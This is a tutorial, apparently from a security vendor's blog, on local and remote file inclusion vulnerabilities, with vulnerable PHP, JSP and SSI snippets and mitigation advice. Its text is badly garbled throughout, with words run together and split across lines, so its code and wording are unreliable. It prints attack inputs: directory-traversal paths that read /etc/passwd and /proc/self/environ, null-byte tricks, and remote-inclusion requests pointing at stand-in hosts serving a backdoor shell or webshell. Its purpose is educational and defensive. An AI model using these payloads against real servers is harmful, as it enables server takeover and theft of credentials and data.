Fi

* l
eIncl
usi
onVul
ner
abi
l
iti
es:
 Whatar
eFi
l
eIncl
usi
onVul
ner
abi
l
iti
es?

 Fi
leInclusi
onvulnerabi
li
ti
esoft
enaffectwebappl
icat
ionsthatrelyonascri
pti
ngrun
ti
me, andoccurwhenawebappl i
cati
onall
owsuserstosubmi tinputi
ntof
il
esorupl
oad
fi
lestotheserver.Theyareof
tenfoundinpoor
ly-
writ
tenappli
cat i
ons.

 Fil
eInclusionvulner
abil
it
iesall
owanatt
ackert
oreadandsometi
mesexecutef
il
eson
thevicti
m serveror,asi
st hecasewi
thRemoteFi
leI
nclusi
on,
toexecut
ecodehost
edon
theattacker’
smachi ne.

 Anattackermayuseremotecodeexecut
iont
ocr
eat
eawebshel
lont
heser
ver
,anduse
thatwebshell
forwebsi
tedefacement
.

 Ty
pesoff
il
eincl
usi
onv
ulner
abi
l
iti
e:

 Fi
lei
ncl
usi
onv
ulner
abi
l
iti
escomei
ntwot
ypes,
dependi
ngont
heor
igi
noft
hei
ncl
uded
fi
l
e:

 –Local
Fil
eIncl
usi
on(
LFI
)

 –Remot
eFi
l
eIncl
usi
on(
RFI
)

 Local
Fil
eIncl
usi
on(
LFI
)
 ALocalFil
eI ncl
usi
onatt
ackisusedtotr
icktheappl
icat
ionint
oexposingorrunningfi
les
ontheserver.Theyal
l
owattacker
stoexecutearbi
tr
arycommandsor ,ift
heserveris
misconf
iguredandrunni
ngwithhighpr
ivi
leges,
togainaccesstosensi
tiv
edata.

 Theseattacksty
pical
l
yoccurwhenanappli
cati
onusesthepathtoafil
easinput.Ift
he
appli
cat
iontreat
sthatinputast
rust
ed,
anatt
ackercanusethelocal
fil
einaninclude
stat
ement .

 Whil
eLocal
Fil
eIncl
usionandRemot
eFi
l
eIncl
usi
onar
ever
ysi
mil
ar,
anat
tackerusi
ng
LFImayi
ncl
udeonlylocal
fil
es.

 Local
Fil
eIncl
usi
on(
LFI
)Exampl
e
 /
**

*Gett
hef
il
enamef
rom aGETi
nput

*Exampl
e-ht
tp:
//exampl
e-websi
te.
com/
?fi
l
e=f
il
ename.
php

*
/Gett
hef
il
enamef
rom aGETi
nput
*Exampl
e-ht
tp:
//exampl
e-websi
te.
com/
?fi
l
e=f
il
ename.
php

*
/

$f
il
e=$_
GET[
‘
fil
e’
];

/
**

*Unsaf
elyi
ncl
udet
hef
il
e

*Exampl
e-f
il
ename.
php

*
/

i
ncl
ude(
‘di
rect
ory
/’.$f
il
e);

 I
ntheexampleabov
etheat
tacker
’si
ntenti
stot
ri
ckt
heappl
i
cat
ioni
ntoexecut
inga
PHPscri
pt,
suchasawebshell

 ht
tp:
//exampl
e-websi
te.
com/
?fi
l
e=.
./
..
/upl
oads/
mal
i
cious.
php

 Onceauserrunsthewebappl
i
cati
on,
thef
il
euploadedbyt
heatt
ackerwi
ll
be
i
ncludedandexecut
ed.Thi
swi
llal
l
owtheat
tackert
orunanyser
ver
-si
decodet
hat
hewants.

 Learnmoreaboutlocalfi
l
eincl
usionatt
ack–
htt
ps:/
/www.neural
egion.
com/blog/l
ocal
-f
il
e-i
ncl
usi
on-
lf
i/

 Remot
eFi
l
eIncl
usi
on(
RFI
)
 AnattackerwhousesRemot eFileIncl
usiontarget
swebappl i
cationsthat
dynamicallyr
efer
enceexter
nalscri
pts.Thegoal oftheat
tackeristoexploi
tthe
ref
erencingfunct
ioni
nthetargetappli
cationandtouploadmal warefr
om ar emot
e
URL,locatedonadiff
erentdomain.

 Theresul
tsofasuccessf
ulRFIatt
ackcanbeinf
ormati
ontheft
,acompr
omi
sed
ser
verandasit
etakeover,
resul
ti
ngincont
entmodif
icat
ion.

 Remot
eFi
l
eIncl
usi
on(
RFI
)Exampl
e
 Thi
sexampl
eil
l
ust
rat
eshowRemot
eFi
l
eIncl
usi
onat
tackswor
k:

 AJav
aSer
verPagespagecont
aini
ngt
hef
oll
owi
ngcode:

<j
ps:
i
ncl
udepage=”
<%=(
Str
ing)
request
.get
Par
amet
er(
“Par
amName”
)%>”
>

canbemani
pul
atedwi
tht
hef
oll
owi
ngr
equest
:

Page1.
jsp?
Par
amName=/
WEB-
INF/
DB/
passwor
d.

 Aft
ert
heappl
i
cat
ionpr
ocessest
her
equest
,itwi
l
lrev
eal
thecont
entoft
hepasswor
d
fi
l
e.

 Theappl
i
cat
ionhasani
mpor
tst
atementt
hatr
equest
scont
entf
rom aURLaddr
ess:

<c:
importur
l=”
<*request
.get
Parameter
(“conf
”)%>”
>.Thesamei
nputst
atementcanbe
usedformalwareinj
ecti
onifthest
atementisunsanit
ized.

Forexampl
e:

Page2.
jsp?
conf
=ht
tps:
//ev
il
-websi
te.
com/
att
ack.
js

 Anat t
ackerwil
loft
enl
aunchaRemot eFi
leIncl
usi
onatt
ackbymani
pul
ati
ngt
he
requestparameter
ssothatt
heyr
efertoaremote,mal
i
ciousf
il
e.

 Forexampl
e,consi
dert
hef
oll
owi
ngcode:

$i
ncf
il
e=$_
REQUEST[
“f
il
e”]
;

i
ncl
ude(
$incf
il
e.”
.php”
);

$i
ncf
il
e=$_
REQUEST[
“f
il
e”]
;–ext
ract
sthef
il
epar
amet
erv
aluef
rom t
heHTTPr
equest
.

i
ncl
ude(
$incf
il
e.”
.php”
);–usest
hatv
aluet
ody
nami
cal
l
ysett
hef
il
ename.

I
fyoudon’thav
epropersani
ti
zat
ioni
npl
ace,
thi
scodecanbeexpl
oit
ed,
resul
ti
ngi
n
unaut
hor
izedfi
leupl
oads.
 Forexample,thisURLst ri
ng:http:
//www. example-
websit
e.com/ vulnerabl
e_page.php?fi
l
e=ht tp:/
/www.at
tacker.
com/backdoor
cont
ains
anexternal
refer encetoabackdoorf il
est oredinaremotelocat
ion
(ht
tp:
//www. attacker.
com/ backdoor_shell
.php.)

 Onceuploadedt
otheappl
icati
on,t
hisuploadedbackdoorcanbel
aterusedt
ohi
j
ack
t
heserverorgai
naccesst
ot heappli
cat
iondatabase.

 RFIpr
event
ionandmi
ti
gat
ion
 Tominimi
zether i
skofRFIatt
acks,properi
nputvali
dati
onandsaniti
zat
ionhastobe
i
mplemented.Ensureyoudon’
tfal
lv i
cti
m ofthemisconcepti
onthatal
luseri
nputs
canbeful
lysani
ti
zed.Lookatsanit
izati
ononlyasanaddi t
ivetoadedi
catedsecur
it
y
sol
uti
on.

 Sani
ti
zet
heusersuppl
i
edorcont
rol
l
edi
nputt
hebesty
oucani
ncl
udi
ng:

HTTPheaderv
alues

URLpar
amet
ers

Cooki
eval
ues

GET/
POSTpar
amet
ers

 Checkt
heinputfi
eldsagai
nstawhi
tel
i
st.Anattackercansuppl
yinputi
nadi
ff
erent
for
mat(encodedorhexadeci
malf
ormats)andbypassablackli
st.

 Cli
ent-
sideval
i
dationcomeswit
hthebenef
itofr
educedpr
ocessi
ngov
erhead,
but
theyar
ev ul
nerabl
etoatt
acksbyproxyt
ool
s,soappl
ytheval
i
dati
onontheser
ver
end.

 Makesur
eyour estr
ictexecut
ionpermi
ssi
onsfortheupl
oaddir
ect
ori
es,
mai
ntai
na
whi
tel
i
stofacceptablefi
lesty
pes,andr
estr
ictupl
oadfi
lesi
zes.

 Fi
l
eincl
usi
onv
ulner
abi
l
iti
esi
ncommonpr
ogr
ammi
ngl
anguageswi
thexampl
es

 Fi
l
eincl
usi
oni
nPHP

ThemaincauseofFil
eIncl
usionvulnerabil
i
tiesi
nPHP, i
stheuseofunvali
dateduser-
i
nputwit
haf i
l
esyst
em functi
onthatincludesafil
eforexecut
ion–mostnot abl
ebeing
thei
ncl
udeandrequi
restatements.InPHP5. xt
heall
ow_url
_i
ncludedi
rect
iveisdi
sabled
bydef
aul
t,butbecauti
ouswit
happli
cati
onswri
tteninol
derPHPv
ersi
ons,
because
bef
ore5.
xallow_ur
l_i
ncl
udewasenabledbydef
ault.

Thegoaloftheat
tackeristoalt
eravar
iabl
ethati
spassedtooneoft
hesef
unct
ions,
to
causei
ttoincl
udemal i
ciouscodefr
om aremoteresour
ce.

Tomit
igat
etheri
skofFi
leI
ncl
usi
onvulner
abil
i
tiesi
nPHP,
makesur
eal
luseri
nputi
s
val
i
dat
edbeforei
t’
sbei
ngusedbytheappl
icat
ion.

Exampl
eofanf
il
eIncl
usi
onv
ulner
abi
l
ityi
nPHP

<?
php

I
f(i
sset
($_
GET[
‘
language’
]
)){

i
ncl
ude(
$_GET[
‘
language’
].‘
.
php’
);

?
>

<f
orm met
hod=”
get
”>

<sel
ectname=”
language”
>

<opt
ionv
alue=”
engl
i
sh”
>Engl
i
sh</
opt
ion>

<opt
ionv
alue=”
french”
>Fr
ench</
opt
ion>

</
sel
ect
>

<i
nputt
ype=”
submi
t”
>

</
for
m>

Thedev
eloperi
ntendedtor
eadinengl
ish.
phporf
rench.
php,whichwil
lal
tert
he
appl
i
cati
on’
sbehav i
ortodi
spl
aythel
anguageoft
heuser’schoi
ce.Buti
tispossi
blet
o
i
njectanot
herpat
husi
ngt
hel
anguagepar
amet
er.

Forexampl
e:

/vul
nerabl
e.php?l
anguage=htt
p://ev
il
.exampl
e.com/webshel
l
.txt
?–i
nject
sar
emot
ely
hostedfi
lecontai
ningamal i
ciouscode( r
emot
ef i
lei
ncl
ude)

/vulner
abl
e.php?
language=C:\
\ft
p\\upl
oad\\expl
oit–Execut
escodef
rom anal
ready
uploadedfi
l
ecalledexploi
t.
php(localf
il
eincl
usionvul
nerabi
l
ity
)

/vul
ner
able.php?
language=C:\\
notes.t
xt%00–exampleusingNULLmet acharact
erto
removethe.phpsuffi
x,all
owingaccesst of
il
esothert
han.php.Note,
thi
suseofnul l
bytei
nject
ionwaspat chedinPHP5. 3,andcannolongerbeusedforLFI
/RFIatt
acks.

/vul
nerable.
php?l
anguage=.
./
..
/..
/.
./
..
/et
c/passwd%00–allowsanatt
ackertoreadthe
contentsoftheet
c/passwdfil
eonaUni x-
li
kesyst
em t
hroughadir
ector
ytraver
salatt
ack.

/vulnerable.
php?language=..
/.
./.
./
../
..
/pr
oc/sel
f/envi
ron%00–allowsanat t
ackertoread
thecont entsofthe/ pr
oc/sel
f/envir
onfil
eonaUni x-
li
kesy st
em t
hroughadirect
ory
traversalatt
ack.Anat t
ackercanmodi fyaHTTPheader( suchasUser-Agent)i
nthis
attackt obePHPcodet oexploitremotecodeexecution.

Thebestsol uti
oninthiscaseist ouseawhi t
eli
stofacceptedl anguageparamet ers.Ifa
str
ongmet hodofinputvali
dation,suchasawhi t
eli
st,cannotbeused, t
henr elyupon
i
nputf il
ter
ingorvali
dati
onoft hepassed- i
npat htomakesur eitdoesnotcontain
uni
nt endedcharacter
sandchar acterpat
terns.Howev er,
thismayr equi
reanticipatingall
possibleprobl
emat i
ccharactercombi nati
ons.Asaf ersolut
ioni stouseapredef ined
Switch/Casestatementtodet erminewhichf il
etoincluderatherthanuseaURLorf or
m
paramet ertodynamicall
ygener atethepath.

Jav
aSer
verPages(
JSP)

JavaSer
verPages(
JPS)i
sascr
ipt
ingl
anguagewhi
chcani
ncl
udef
il
esf
orexecut
ionat
runt
ime.

Exampl
eofanFi
l
eIncl
usi
onv
ulner
abi
l
ityi
nJSP

<%
St
ri
ngp=r
equest
.get
Par
amet
er(
“p”
);

@i
ncl
udef
il
e=”
<%=”
incl
udes/
”+p+”
.j
sp”
%>”

%>

/vul
nerabl
e.j
ps?
p=.
./.
./
..
/ .
./
var
/log/
access.l
og%00–Unli
kePHP,JSPi
sst
il
laf
fect
edby
Nullbyt
einj
ecti
on,
andt hi
sparam wil
lexecuteJSPcommandsf
oundi
nthewebserv
er’
s
accesslog.

Ser
verSi
deI
ncl
udes(
SSI
)

Alt
houghaServerSi
deIncl
udeisuncommonandnottypi
cal
l
yenabledonadefaul
tweb
serv
er,i
tcanbeusedtogainr
emotecodeexecut
iononavul
ner
ablewebserv
er.

Exampl
eofanFi
l
eIncl
udev
ulner
abi
l
ityi
nSSI

Thef
oll
owi
ngcodei
svul
ner
abl
etoar
emot
e-f
il
eincl
usi
onv
ulner
abi
l
ity
:

<!
DOCTYPEht
ml>

<ht
ml>

<head>

<t
it
le>Testf
il
e</
ti
tl
e>

<head>

<body
>

<!
--
#incl
udef
il
e=”
USER_
LANGUAGE”
--
>

</
body
>

</
html
>

Theabovecodei
snotanXSSv
ulner
abi
l
ity
,butr
atheri
ncl
udi
nganewf
il
etobeexecut
ed
bytheser
ver.